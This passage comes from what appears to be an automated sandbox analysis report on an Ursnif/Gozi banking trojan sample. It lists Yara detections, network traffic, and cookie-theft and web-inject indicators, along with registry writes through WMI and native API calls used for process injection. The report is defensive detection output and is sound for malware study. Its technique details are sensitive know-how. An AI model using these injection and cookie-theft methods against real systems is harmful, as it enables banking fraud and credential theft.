Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/der-z%c3%bcrcher-stadtrat-andreas-hauri-stellt-sich-zur-wiederw
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/ein-neues-gutachten-bezeichnet-das-corona-grundeinkommen-f%c3%b
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/eis-und-schnee-f%c3%bchren-zu-stau-und-zugausf%c3%a4llen/ar-BB1
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/schauk%c3%a4sereien-in-die-innenstadt-so-k%c3%b6nnte-die-zukunf
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/screen-zeigt-porno-mitten-in-z%c3%bcrich-nicht-der-erste-vorfal
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/stadt-z%c3%bcrich-beteiligt-sich-an-hochwasserschutz-f%c3%bcrs-
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/wir-wissen-nicht-wann-die-n%c3%a4chsten-impfdosen-eintreffen-im
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/z%c3%bcrcher-gemeinderat-sagt-ja-zum-velotunnel/ar-BB1dARla?oci
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/z%c3%bcrich-kopiert-basel-und-hilft-firmen-bei-den-gesch%c3%a4f
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/zu-dr%c3%a4ngeln-bis-man-geimpft-wird-bringt-gar-nichts-der-inf
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.skype.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.4.dr String found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
Source: iab2Data[1].json.4.dr String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49734 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.778286799.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778174223.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778148472.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778122341.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778237278.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778275510.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.785789013.0000000004D6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778197663.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778255655.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5032, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3848, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5152, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2848, type: MEMORY

E-Banking Fraud:

barindex
Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 1_2_00B15ECA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 1_2_00B15ECA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 1_2_00B15ECA
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.778286799.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778174223.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778148472.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778122341.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778237278.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778275510.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.785789013.0000000004D6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778197663.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778255655.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5032, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3848, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5152, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2848, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001F6EF1 NtCreateSection,memset, 1_2_001F6EF1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001F7925 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_001F7925
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001F9DDB NtMapViewOfSection, 1_2_001F9DDB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B1A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_00B1A027
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B1E010 GetProcAddress,NtCreateSection,memset, 1_2_00B1E010
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B27AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_00B27AFF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B26CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 1_2_00B26CBC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B2AC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 1_2_00B2AC94
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B1ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_00B1ACD5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B19DAC NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_00B19DAC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B2CD7A NtQueryInformationProcess, 1_2_00B2CD7A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B27579 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, 1_2_00B27579
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B17E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 1_2_00B17E14
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B347A1 NtMapViewOfSection, 1_2_00B347A1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B137E7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_00B137E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B240A7 memset,NtQueryInformationProcess, 1_2_00B240A7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B17878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 1_2_00B17878
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B3298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_00B3298D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B1AA15 NtQuerySystemInformation,RtlNtStatusToDosError, 1_2_00B1AA15
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B24C67 NtGetContextThread,RtlNtStatusToDosError, 1_2_00B24C67
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B145FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 1_2_00B145FF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B2956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_00B2956E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B21606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_00B21606
Source: C:\Windows\System32\control.exe Code function: 24_2_00971084 NtQueryInformationProcess, 24_2_00971084
Source: C:\Windows\System32\control.exe Code function: 24_2_009840A4 NtQueryInformationProcess, 24_2_009840A4
Source: C:\Windows\System32\control.exe Code function: 24_2_0097F0D0 NtReadVirtualMemory, 24_2_0097F0D0
Source: C:\Windows\System32\control.exe Code function: 24_2_0096B980 NtMapViewOfSection, 24_2_0096B980
Source: C:\Windows\System32\control.exe Code function: 24_2_009669DC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 24_2_009669DC
Source: C:\Windows\System32\control.exe Code function: 24_2_0098D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose, 24_2_0098D9EC
Source: C:\Windows\System32\control.exe Code function: 24_2_00961148 NtCreateSection, 24_2_00961148
Source: C:\Windows\System32\control.exe Code function: 24_2_00967DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 24_2_00967DA0
Source: C:\Windows\System32\control.exe Code function: 24_2_00981DF4 NtWriteVirtualMemory, 24_2_00981DF4
Source: C:\Windows\System32\control.exe Code function: 24_2_009846EC NtAllocateVirtualMemory, 24_2_009846EC
Source: C:\Windows\System32\control.exe Code function: 24_2_009A1002 NtProtectVirtualMemory,NtProtectVirtualMemory, 24_2_009A1002
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFF1084 NtQueryInformationProcess, 26_2_0000016D9CFF1084
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D00D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose, 26_2_0000016D9D00D9EC
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D021002 NtProtectVirtualMemory,NtProtectVirtualMemory, 26_2_0000016D9D021002
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B31CB8 CreateProcessAsUserA, 1_2_00B31CB8
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001F40B3 1_2_001F40B3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001FAF44 1_2_001FAF44
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B248AD 1_2_00B248AD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B1D0DC 1_2_00B1D0DC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B2D057 1_2_00B2D057
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B37188 1_2_00B37188
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B162FA 1_2_00B162FA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B2DA71 1_2_00B2DA71
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B1E384 1_2_00B1E384
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B28BF3 1_2_00B28BF3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B14C03 1_2_00B14C03
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B2ED4B 1_2_00B2ED4B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B33EAF 1_2_00B33EAF
Source: C:\Windows\System32\control.exe Code function: 24_2_009669DC 24_2_009669DC
Source: C:\Windows\System32\control.exe Code function: 24_2_00984B78 24_2_00984B78
Source: C:\Windows\System32\control.exe Code function: 24_2_00985428 24_2_00985428
Source: C:\Windows\System32\control.exe Code function: 24_2_0097A0F0 24_2_0097A0F0
Source: C:\Windows\System32\control.exe Code function: 24_2_0097B814 24_2_0097B814
Source: C:\Windows\System32\control.exe Code function: 24_2_0097782C 24_2_0097782C
Source: C:\Windows\System32\control.exe Code function: 24_2_00979850 24_2_00979850
Source: C:\Windows\System32\control.exe Code function: 24_2_0098A074 24_2_0098A074
Source: C:\Windows\System32\control.exe Code function: 24_2_009649C4 24_2_009649C4
Source: C:\Windows\System32\control.exe Code function: 24_2_009819FC 24_2_009819FC
Source: C:\Windows\System32\control.exe Code function: 24_2_0098A9FC 24_2_0098A9FC
Source: C:\Windows\System32\control.exe Code function: 24_2_009799F8 24_2_009799F8
Source: C:\Windows\System32\control.exe Code function: 24_2_0096B9E8 24_2_0096B9E8
Source: C:\Windows\System32\control.exe Code function: 24_2_0097D92C 24_2_0097D92C
Source: C:\Windows\System32\control.exe Code function: 24_2_0096596C 24_2_0096596C
Source: C:\Windows\System32\control.exe Code function: 24_2_00977218 24_2_00977218
Source: C:\Windows\System32\control.exe Code function: 24_2_00969A34 24_2_00969A34
Source: C:\Windows\System32\control.exe Code function: 24_2_00962A34 24_2_00962A34
Source: C:\Windows\System32\control.exe Code function: 24_2_0096DA3C 24_2_0096DA3C
Source: C:\Windows\System32\control.exe Code function: 24_2_0098E220 24_2_0098E220
Source: C:\Windows\System32\control.exe Code function: 24_2_0097AA28 24_2_0097AA28
Source: C:\Windows\System32\control.exe Code function: 24_2_00986250 24_2_00986250
Source: C:\Windows\System32\control.exe Code function: 24_2_0098EA40 24_2_0098EA40
Source: C:\Windows\System32\control.exe Code function: 24_2_0099027C 24_2_0099027C
Source: C:\Windows\System32\control.exe Code function: 24_2_0098A3B2 24_2_0098A3B2
Source: C:\Windows\System32\control.exe Code function: 24_2_009893FC 24_2_009893FC
Source: C:\Windows\System32\control.exe Code function: 24_2_009803EC 24_2_009803EC
Source: C:\Windows\System32\control.exe Code function: 24_2_00976B00 24_2_00976B00
Source: C:\Windows\System32\control.exe Code function: 24_2_00967B44 24_2_00967B44
Source: C:\Windows\System32\control.exe Code function: 24_2_0097B378 24_2_0097B378
Source: C:\Windows\System32\control.exe Code function: 24_2_0096FCA0 24_2_0096FCA0
Source: C:\Windows\System32\control.exe Code function: 24_2_0096ECE0 24_2_0096ECE0
Source: C:\Windows\System32\control.exe Code function: 24_2_00971C0C 24_2_00971C0C
Source: C:\Windows\System32\control.exe Code function: 24_2_009725A4 24_2_009725A4
Source: C:\Windows\System32\control.exe Code function: 24_2_00965DA8 24_2_00965DA8
Source: C:\Windows\System32\control.exe Code function: 24_2_00978DD0 24_2_00978DD0
Source: C:\Windows\System32\control.exe Code function: 24_2_009665D8 24_2_009665D8
Source: C:\Windows\System32\control.exe Code function: 24_2_009775D8 24_2_009775D8
Source: C:\Windows\System32\control.exe Code function: 24_2_00976528 24_2_00976528
Source: C:\Windows\System32\control.exe Code function: 24_2_00987D44 24_2_00987D44
Source: C:\Windows\System32\control.exe Code function: 24_2_0098C560 24_2_0098C560
Source: C:\Windows\System32\control.exe Code function: 24_2_0097CE90 24_2_0097CE90
Source: C:\Windows\System32\control.exe Code function: 24_2_009696D8 24_2_009696D8
Source: C:\Windows\System32\control.exe Code function: 24_2_00990614 24_2_00990614
Source: C:\Windows\System32\control.exe Code function: 24_2_00961600 24_2_00961600
Source: C:\Windows\System32\control.exe Code function: 24_2_0096DF58 24_2_0096DF58
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D004B78 26_2_0000016D9D004B78
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D005428 26_2_0000016D9D005428
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFFD92C 26_2_0000016D9CFFD92C
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFF9850 26_2_0000016D9CFF9850
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFF782C 26_2_0000016D9CFF782C
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFFB814 26_2_0000016D9CFFB814
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFE49C4 26_2_0000016D9CFE49C4
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFE596C 26_2_0000016D9CFE596C
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D00A074 26_2_0000016D9D00A074
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFFA0F0 26_2_0000016D9CFFA0F0
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFEDA3C 26_2_0000016D9CFEDA3C
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFE2A34 26_2_0000016D9CFE2A34
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFE9A34 26_2_0000016D9CFE9A34
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFFAA28 26_2_0000016D9CFFAA28
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFF7218 26_2_0000016D9CFF7218
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFF99F8 26_2_0000016D9CFF99F8
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFEB9E8 26_2_0000016D9CFEB9E8
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D00A3B2 26_2_0000016D9D00A3B2
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFE69DC 26_2_0000016D9CFE69DC
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D0019FC 26_2_0000016D9D0019FC
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D00A9FC 26_2_0000016D9D00A9FC
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D00E220 26_2_0000016D9D00E220
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFFB378 26_2_0000016D9CFFB378
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D00EA40 26_2_0000016D9D00EA40
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D006250 26_2_0000016D9D006250
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9CFE7B44 26_2_0000016D9CFE7B44
Source: C:\Windows\System32\rundll32.exe Code function: 26_2_0000016D9D01027C 26_2_0000016D9D01027C
